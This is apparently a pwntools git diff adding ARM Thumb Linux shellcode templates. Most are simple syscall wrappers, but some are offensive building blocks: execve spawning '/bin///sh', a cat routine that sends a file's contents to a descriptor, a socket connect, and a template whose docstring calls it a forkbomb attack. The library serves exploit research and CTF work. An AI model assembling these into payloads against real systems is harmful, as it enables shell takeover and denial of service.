Save for later + push {r0} +## Calculate how many characters are needed. +## e.g. 0 -> 1 +## 1 -> 1 +## 23 -> 2 +## 1234 -> 4 +${size_loop}: + add r3, r3, 1 + ${udiv_10('r0')} + cmp r0, 1 + bhs ${size_loop} +## Calculate the end of the buffer and null-terminate +## N.B. r0 == 0 here + add r3, r4, r3 + strb r0, [r3, #1] +## Grab saved "original value" off the stack + pop {r0} +${itoa_loop}: + ${mov('r5', 'r0')} /* save before division */ + ${udiv_10('r0')} +## Multiply back by 10 to get remainder + /* multiply by 10 to get remainder in r5 */ + ${mov('r1', 10)} + umull r1, r2, r0, r1 + sub r5, r5, r1 + /* store the byte, decrement, check complete */ + add r5, r5, ${ord('0')} + strb r5, [r3, #-1]! + cmp r3, r4 + bgt ${itoa_loop} diff --git a/pwnlib/shellcraft/templates/thumb/linux/accept.asm b/pwnlib/shellcraft/templates/thumb/linux/accept.asm new file mode 100644 index 000000000..114f91387 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/accept.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, addr, addr_len"/> +<%docstring> +Invokes the syscall accept. See 'man 2 accept' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_accept', fd, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/access.asm b/pwnlib/shellcraft/templates/thumb/linux/access.asm new file mode 100644 index 000000000..6e3166500 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/access.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name, type"/> +<%docstring> +Invokes the syscall access. See 'man 2 access' for more information. + +Arguments: + name(char): name + type(int): type + + + ${syscall('SYS_access', name, type)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/acct.asm b/pwnlib/shellcraft/templates/thumb/linux/acct.asm new file mode 100644 index 000000000..dfce9308e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/acct.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall acct. See 'man 2 acct' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_acct', name)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/alarm.asm b/pwnlib/shellcraft/templates/thumb/linux/alarm.asm new file mode 100644 index 000000000..5bb8f0865 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/alarm.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="seconds"/> +<%docstring> +Invokes the syscall alarm. See 'man 2 alarm' for more information. + +Arguments: + seconds(unsigned): seconds + + + ${syscall('SYS_alarm', seconds)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/bind.asm b/pwnlib/shellcraft/templates/thumb/linux/bind.asm new file mode 100644 index 000000000..80d55df2f --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/bind.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall bind. See 'man 2 bind' for more information. + +Arguments: + fd(int): fd + addr(CONST_SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_bind', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/brk.asm b/pwnlib/shellcraft/templates/thumb/linux/brk.asm new file mode 100644 index 000000000..3466d8e58 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/brk.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="addr"/> +<%docstring> +Invokes the syscall brk. See 'man 2 brk' for more information. + +Arguments: + addr(void): addr + + + ${syscall('SYS_brk', addr)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/cat.asm b/pwnlib/shellcraft/templates/thumb/linux/cat.asm new file mode 100644 index 000000000..7f5380392 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/cat.asm @@ -0,0 +1,25 @@ +<% + from pwnlib import constants + from pwnlib.shellcraft import thumb + from pwnlib.shellcraft import common +%> +<%page args="filename, fd=1"/> +<%docstring> +Opens a file and writes its contents to the specified file descriptor. + +Example: + + >>> f = tempfile.mktemp() + >>> write(f, 'FLAG\n') + >>> run_assembly(shellcraft.arm.to_thumb()+shellcraft.thumb.linux.cat(f)).recvline() + 'FLAG\n' + + +<% +label = common.label("sendfile_loop") +%> + + ${thumb.pushstr(filename)} + ${thumb.linux.open('sp', 0, constants.O_RDONLY)} + ${thumb.mov('r5', 'r0')} + ${thumb.linux.sendfile(fd, 'r5', 0, 0x7fffffff)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/chdir.asm b/pwnlib/shellcraft/templates/thumb/linux/chdir.asm new file mode 100644 index 000000000..4b548ae39 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/chdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chdir. See 'man 2 chdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chdir', path)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/chmod.asm b/pwnlib/shellcraft/templates/thumb/linux/chmod.asm new file mode 100644 index 000000000..2d444f3c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/chmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall chmod. See 'man 2 chmod' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_chmod', file, mode)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/chown.asm b/pwnlib/shellcraft/templates/thumb/linux/chown.asm new file mode 100644 index 000000000..f2db3165e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/chown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, owner, group"/> +<%docstring> +Invokes the syscall chown. See 'man 2 chown' for more information. + +Arguments: + file(char): file + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_chown', file, owner, group)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/chroot.asm b/pwnlib/shellcraft/templates/thumb/linux/chroot.asm new file mode 100644 index 000000000..e0a605006 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/chroot.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall chroot. See 'man 2 chroot' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_chroot', path)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm new file mode 100644 index 000000000..95b916808 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/clock_getres.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="clock_id, res"/> +<%docstring> +Invokes the syscall clock_getres. See 'man 2 clock_getres' for more information. + +Arguments: + clock_id(clockid_t): clock_id + res(timespec): res + + + ${syscall('SYS_clock_getres', clock_id, res)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm new file mode 100644 index 000000000..06e95d596 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/clock_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_gettime. See 'man 2 clock_gettime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_gettime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm new file mode 100644 index 000000000..13b8bdcec --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/clock_nanosleep.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="clock_id, flags, req, rem"/> +<%docstring> +Invokes the syscall clock_nanosleep. See 'man 2 clock_nanosleep' for more information. + +Arguments: + clock_id(clockid_t): clock_id + flags(int): flags + req(timespec): req + rem(timespec): rem + + + ${syscall('SYS_clock_nanosleep', clock_id, flags, req, rem)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm b/pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm new file mode 100644 index 000000000..c4e578fb1 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/clock_settime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="clock_id, tp"/> +<%docstring> +Invokes the syscall clock_settime. See 'man 2 clock_settime' for more information. + +Arguments: + clock_id(clockid_t): clock_id + tp(timespec): tp + + + ${syscall('SYS_clock_settime', clock_id, tp)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/clone.asm b/pwnlib/shellcraft/templates/thumb/linux/clone.asm new file mode 100644 index 000000000..52ea2c5b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/clone.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fn, child_stack, flags, arg, vararg"/> +<%docstring> +Invokes the syscall clone. See 'man 2 clone' for more information. + +Arguments: + fn(int): fn + child_stack(void): child_stack + flags(int): flags + arg(void): arg + vararg(int): vararg + + + ${syscall('SYS_clone', fn, child_stack, flags, arg, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/close.asm b/pwnlib/shellcraft/templates/thumb/linux/close.asm new file mode 100644 index 000000000..a3ec97688 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/close.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall close. See 'man 2 close' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_close', fd)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/connect.asm b/pwnlib/shellcraft/templates/thumb/linux/connect.asm index b4863ac86..2ec13aa49 100644 --- a/pwnlib/shellcraft/templates/thumb/linux/connect.asm +++ b/pwnlib/shellcraft/templates/thumb/linux/connect.asm @@ -1,5 +1,9 @@ -<% from pwnlib.shellcraft import thumb %> -<% from pwnlib.util.net import sockaddr %> +<% + from pwnlib.shellcraft.thumb import push, mov, pushstr + from pwnlib.shellcraft.thumb.linux import syscall + from pwnlib.constants import SOCK_STREAM, SYS_socket, SYS_connect + from pwnlib.util.net import sockaddr +%> <%page args="host, port, network='ipv4'"/> <%docstring> Connects to the host on the specified port. @@ -9,22 +13,14 @@ <% sockaddr, addr_len, address_family = sockaddr(host, port, network) %>\ - /* First create socket */ - ${thumb.mov('r7', 'SYS_socket')} - ${thumb.mov('r0', address_family)} - ${thumb.mov('r1', 'SOCK_STREAM')} - eor r2, r2 - svc 1 +/* open new socket */ + ${syscall(SYS_socket, address_family, SOCK_STREAM, 0)} - /* Save socket in r6 */ - mov r6, r0 +/* save opened socket */ + ${mov('r6', 'r0')} - /* Create address structure on stack */ - ${thumb.pushstr(sockaddr, False)} +/* push sockaddr, connect() */ + ${pushstr(sockaddr, False)} + ${syscall(SYS_connect, 'r6', 'sp', addr_len)} - /* Connect the socket */ - ${thumb.mov('r7', 'SYS_connect')} - ${thumb.mov('r0', 'r6')} - ${thumb.mov('r1', 'sp')} - ${thumb.mov('r2', addr_len)} - svc 1 +/* Socket that is maybe connected is in r6 */ diff --git a/pwnlib/shellcraft/templates/thumb/linux/creat.asm b/pwnlib/shellcraft/templates/thumb/linux/creat.asm new file mode 100644 index 000000000..a0d4d3cb2 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/creat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="file, mode"/> +<%docstring> +Invokes the syscall creat. See 'man 2 creat' for more information. + +Arguments: + file(char): file + mode(mode_t): mode + + + ${syscall('SYS_creat', file, mode)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/dup2.asm b/pwnlib/shellcraft/templates/thumb/linux/dup2.asm new file mode 100644 index 000000000..b8cfb0fe7 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/dup2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, fd2"/> +<%docstring> +Invokes the syscall dup2. See 'man 2 dup2' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + + + ${syscall('SYS_dup2', fd, fd2)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/dup3.asm b/pwnlib/shellcraft/templates/thumb/linux/dup3.asm new file mode 100644 index 000000000..4b8903dfe --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/dup3.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, fd2, flags"/> +<%docstring> +Invokes the syscall dup3. See 'man 2 dup3' for more information. + +Arguments: + fd(int): fd + fd2(int): fd2 + flags(int): flags + + + ${syscall('SYS_dup3', fd, fd2, flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/echo.asm b/pwnlib/shellcraft/templates/thumb/linux/echo.asm new file mode 100644 index 000000000..6aafa20b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/echo.asm @@ -0,0 +1,14 @@ +<% from pwnlib.shellcraft import thumb %> +<%page args="string, sock = '1'"/> +<%docstring> +Writes a string to a file descriptor + +Example: + + >>> run_assembly(shellcraft.echo('hello\n', 1)).recvline() + 'hello\n' + + + +${thumb.pushstr(string, append_null = False)} +${thumb.linux.syscall('SYS_write', sock, 'sp', len(string))} diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm new file mode 100644 index 000000000..d597247da --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_create.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="size"/> +<%docstring> +Invokes the syscall epoll_create. See 'man 2 epoll_create' for more information. + +Arguments: + size(int): size + + + ${syscall('SYS_epoll_create', size)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm new file mode 100644 index 000000000..e416db03c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_create1.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall epoll_create1. See 'man 2 epoll_create1' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_epoll_create1', flags)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm new file mode 100644 index 000000000..df17011b4 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm new file mode 100644 index 000000000..3eb3b04dc --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm new file mode 100644 index 000000000..b5d363d00 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/execve.asm b/pwnlib/shellcraft/templates/thumb/linux/execve.asm new file mode 100644 index 000000000..73cada992 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/execve.asm @@ -0,0 +1,26 @@ +<% + from pwnlib.shellcraft import thumb + from pwnlib.abi import linux_arm_syscall +%> +<%docstring> +Execute a different process. + +<%page args="path = '/bin///sh', argv=[], envp={}"/> +<% +if isinstance(envp, dict): + envp = ['%s=%s' % (k,v) for (k,v) in envp.items()] + +regs = linux_arm_syscall.register_arguments +%> +% if argv: + ${thumb.pushstr_array(regs[2], argv)} +% else: + ${thumb.mov(regs[2], 0)} +% endif +% if envp: + ${thumb.pushstr_array(regs[3], envp)} +% else: + ${thumb.mov(regs[3], 0)} +% endif + ${thumb.pushstr(path)} + ${thumb.syscall('SYS_execve', 'sp', regs[2], regs[3])} diff --git a/pwnlib/shellcraft/templates/thumb/linux/exit.asm b/pwnlib/shellcraft/templates/thumb/linux/exit.asm new file mode 100644 index 000000000..d5cf39c69 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/exit.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/faccessat.asm b/pwnlib/shellcraft/templates/thumb/linux/faccessat.asm new file mode 100644 index 000000000..d7cc471e9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fallocate.asm b/pwnlib/shellcraft/templates/thumb/linux/fallocate.asm new file mode 100644 index 000000000..6ef6008b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchdir.asm b/pwnlib/shellcraft/templates/thumb/linux/fchdir.asm new file mode 100644 index 000000000..bfc7748e0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchmod.asm b/pwnlib/shellcraft/templates/thumb/linux/fchmod.asm new file mode 100644 index 000000000..f52f0242e --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm b/pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm new file mode 100644 index 000000000..7d14b2cd8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchmodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchown.asm b/pwnlib/shellcraft/templates/thumb/linux/fchown.asm new file mode 100644 index 000000000..5966cbb9b --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fchownat.asm b/pwnlib/shellcraft/templates/thumb/linux/fchownat.asm new file mode 100644 index 000000000..4935467b0 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fcntl.asm b/pwnlib/shellcraft/templates/thumb/linux/fcntl.asm new file mode 100644 index 000000000..d01504320 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fcntl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm b/pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm new file mode 100644 index 000000000..822d6ac82 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/flock.asm b/pwnlib/shellcraft/templates/thumb/linux/flock.asm new file mode 100644 index 000000000..3719a15a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fork.asm b/pwnlib/shellcraft/templates/thumb/linux/fork.asm new file mode 100644 index 000000000..733b4909c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm b/pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm new file mode 100644 index 000000000..20a99073c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/forkbomb.asm @@ -0,0 +1,13 @@ +<% + from pwnlib.shellcraft.thumb.linux import fork + from pwnlib.shellcraft.common import label +%> +<%docstring> +Performs a forkbomb attack. + +<% + dosloop = label('fork_bomb') +%> +${dosloop}: + ${fork()} + b ${dosloop} diff --git a/pwnlib/shellcraft/templates/thumb/linux/forkexit.asm b/pwnlib/shellcraft/templates/thumb/linux/forkexit.asm new file mode 100644 index 000000000..db8d805da --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/forkexit.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.thumb.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp r0, 1 + blt ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/thumb/linux/fstat.asm b/pwnlib/shellcraft/templates/thumb/linux/fstat.asm new file mode 100644 index 000000000..f5e2cd958 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fstat64.asm b/pwnlib/shellcraft/templates/thumb/linux/fstat64.asm new file mode 100644 index 000000000..e35781cdf --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm b/pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm new file mode 100644 index 000000000..b6e7fc958 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/fsync.asm b/pwnlib/shellcraft/templates/thumb/linux/fsync.asm new file mode 100644 index 000000000..e508a4857 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm b/pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm new file mode 100644 index 000000000..db1c3dee8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm new file mode 100644 index 000000000..0917219d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/thumb/linux/futimesat.asm b/pwnlib/shellcraft/templates/thumb/linux/futimesat.asm new file mode 100644 index 000000000..2df7cd03c --- /dev/null +++ b/pwnlib/shellcraft/templates/thumb/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.thumb.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + 